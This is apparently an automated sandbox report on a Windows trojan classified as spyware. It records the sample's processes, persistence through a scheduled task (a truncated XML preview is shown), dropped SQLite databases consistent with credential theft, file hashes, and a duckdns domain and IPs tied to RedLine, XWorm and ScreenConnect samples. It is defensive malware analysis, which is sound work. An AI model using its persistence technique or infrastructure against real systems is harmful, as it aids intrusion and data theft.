                                                                      Overall analysis duration:0h 7m 47s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:21
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:13P2mxLaQk.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:B47604CCFF9C611EAF0AA3D7443827B7.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@18/100@2/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 99%
                                                                      • Number of executed functions: 135
                                                                      • Number of non-executed functions: 7
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 104.26.12.31, 172.67.75.172, 104.26.13.31
                                                                      • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • VT rate limit hit for: 13P2mxLaQk.exe
                                                                      Time | Type | Description
                                                                      05:29:14 | API Interceptor | 1x Sleep call for process: 13P2mxLaQk.exe modified
                                                                      05:29:16 | API Interceptor | 19x Sleep call for process: powershell.exe modified
                                                                      05:29:17 | API Interceptor | 1x Sleep call for process: VWGccZGgix.exe modified
                                                                      05:29:24 | API Interceptor | 87x Sleep call for process: RegSvcs.exe modified
                                                                      11:29:16 | Task Scheduler | Run new task: VWGccZGgix path: C:\Users\user\AppData\Roaming\VWGccZGgix.exe
                                                                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                      billred229102.duckdns.org | Payment slip.exe | malicious | RedLine | 37.48.118.12
                                                                       | Payment slip.exe | malicious | RedLine | 37.48.118.12
                                                                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                      LVLT-10753US | SOA-injazfe-10424.vbs | malicious | XWorm | 45.88.91.147
                                                                       | kUiqbpzmbo.exe | malicious | XWorm | 178.215.236.225
                                                                       | yakov.x86.elf | malicious | Mirai | 168.215.26.13
                                                                       | Scan_doc_09_16_24_1120.exe | malicious | ScreenConnect Tool | 178.215.236.119
                                                                       | Scan_doc_09_16_24_1203.exe | malicious | ScreenConnect Tool | 178.215.236.119
                                                                       | Scan_doc_09_16_24_1120.exe | malicious | ScreenConnect Tool | 178.215.236.119
                                                                       | Scan_doc_09_16_24_1203.exe | malicious | ScreenConnect Tool | 178.215.236.119
                                                                       | VD01NDHM8u.exe | malicious | ScreenConnect Tool | 178.215.236.119
                                                                       | vovE92JSzK.exe | malicious | ScreenConnect Tool | 178.215.236.119
                                                                       | s9POKY8U8k.exe | malicious | ScreenConnect Tool | 178.215.236.119
                                                                      Process:C:\Users\user\Desktop\13P2mxLaQk.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                      Malicious:true
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):2666
                                                                      Entropy (8bit):5.345804351520589
                                                                      Encrypted:false
                                                                      SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpH8HKx1qHxLU:vq5qxqdqolqztYqh3oPtI6mq7qoT5JcE
                                                                      MD5:7ADCF08EB89A57934E566936815936CF
                                                                      SHA1:C164331AA17656919323F4464BC1FC1EB1B8CA90
                                                                      SHA-256:848A610C0FC09EF83A3DFC86A453C9B6F81DAA2A89779529254577F818E68933
                                                                      SHA-512:54EB0F3313760BC4C88C736C5CE57B1890BBCD00376445B3BFC3BB17C6ACBCE22700491D96B6E7E926892555B2AC0C62F0C31557F0E00C00EA38D225228212D3
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                                      Process:C:\Users\user\AppData\Roaming\VWGccZGgix.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):2232
                                                                      Entropy (8bit):5.379071839957789
                                                                      Encrypted:false
                                                                      SSDEEP:48:bWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:bLHxvIIwLgZ2KRHWLOugss
                                                                      MD5:C3F9F475D953A9DC179502BE9BDECF03
                                                                      SHA1:A18CD4620483891E0A09A31F9A3B026B6F7462AB
                                                                      SHA-256:E088F0002182EA78456B394018C08C88B0FC73D5A4AB9DE3FE4E18DFB02C8F3A
                                                                      SHA-512:FE4F3C44B628418A78B1C6808DFB2FCC5042E64CBD06A6C5D8602F4755905B4D593C95A797C82080A6D775E525C983D2004C106B8E211E3FCBB5A04189AD582B
                                                                      Malicious:false
                                                                      Preview:@...e.................................&..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):98304
                                                                      Entropy (8bit):0.08235737944063153
                                                                      Encrypted:false
                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\13P2mxLaQk.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1583
                                                                      Entropy (8bit):5.116948366756834
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtjH+xvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTTyv
                                                                      MD5:22D047822BA2A06D0C8CCA257E122C85
                                                                      SHA1:EC12B5B3EA1A2D69E500C9C963C9C8370B3CAFAF
                                                                      SHA-256:D4051FBAE814F378F47D44D7C1021A6D4167946CE5767071461554DC7DF6FB15
                                                                      SHA-512:49D1B177CDD726426875BD03115C6EFA438853489FC48BA3C94F309B3F6EA9203D97C8038628C2A2B9E7BDB5C4B4074D58ABAE3CB0FFE77C17ACFEDE9C6C0640
                                                                      Malicious:true
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.701188456968639
                                                                      Encrypted:false
                                                                      SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                      MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                      SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                      SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                      SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.698193102830694
                                                                      Encrypted:false
                                                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.702263764575455
                                                                      Encrypted:false
                                                                      SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                      MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                      SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                      SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                                      SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                                      Malicious:false
                                                                      Process:C:\Users\user\AppData\Roaming\VWGccZGgix.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1583
                                                                      Entropy (8bit):5.116948366756834
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtjH+xvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTTyv
                                                                      MD5:22D047822BA2A06D0C8CCA257E122C85
                                                                      SHA1:EC12B5B3EA1A2D69E500C9C963C9C8370B3CAFAF
                                                                      SHA-256:D4051FBAE814F378F47D44D7C1021A6D4167946CE5767071461554DC7DF6FB15
                                                                      SHA-512:49D1B177CDD726426875BD03115C6EFA438853489FC48BA3C94F309B3F6EA9203D97C8038628C2A2B9E7BDB5C4B4074D58ABAE3CB0FFE77C17ACFEDE9C6C0640
                                                                      Malicious:false
                                                                      Preview:
                                                                      <?xml version="1.0" encoding="UTF-16"?>
                                                                      <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
                                                                        <RegistrationInfo>
                                                                          <Date>2014-10-25T14:27:44.8929027</Date>
                                                                          <Author>user-PC\user</Author>
                                                                        </RegistrationInfo>
                                                                        <Triggers>
                                                                          <LogonTrigger>
                                                                            <Enabled>true</Enabled>
                                                                            <UserId>user-PC\user</UserId>
                                                                          </LogonTrigger>
                                                                          <RegistrationTrigger>
                                                                            <Enabled>false</Enabled>
                                                                          </RegistrationTrigger>
                                                                        </Triggers>
                                                                        <Principals>
                                                                          <Principal id="Author">
                                                                            <UserId>user-PC\user</UserId>
                                                                            <LogonType>InteractiveToken</LogonType>
                                                                            <RunLevel>LeastPrivilege</RunLevel>
                                                                          </Principal>
                                                                        </Principals>
                                                                        <Settings>
                                                                          <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
                                                                          <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
                                                                          <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
                                                                          <AllowHardTerminate>false</AllowHardTerminate>
                                                                          <StartWhenAvailable>true</StartWhenAvailable>
                                                                          <RunOnlyIfNetwor
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.701188456968639
                                                                      Encrypted:false
                                                                      SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                      MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                      SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                      SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                      SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.698193102830694
                                                                      Encrypted:false
                                                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                      Malicious:false
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.702263764575455
                                                                      Encrypted:false
                                                                      SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                      MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                      SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                      SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                                      SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
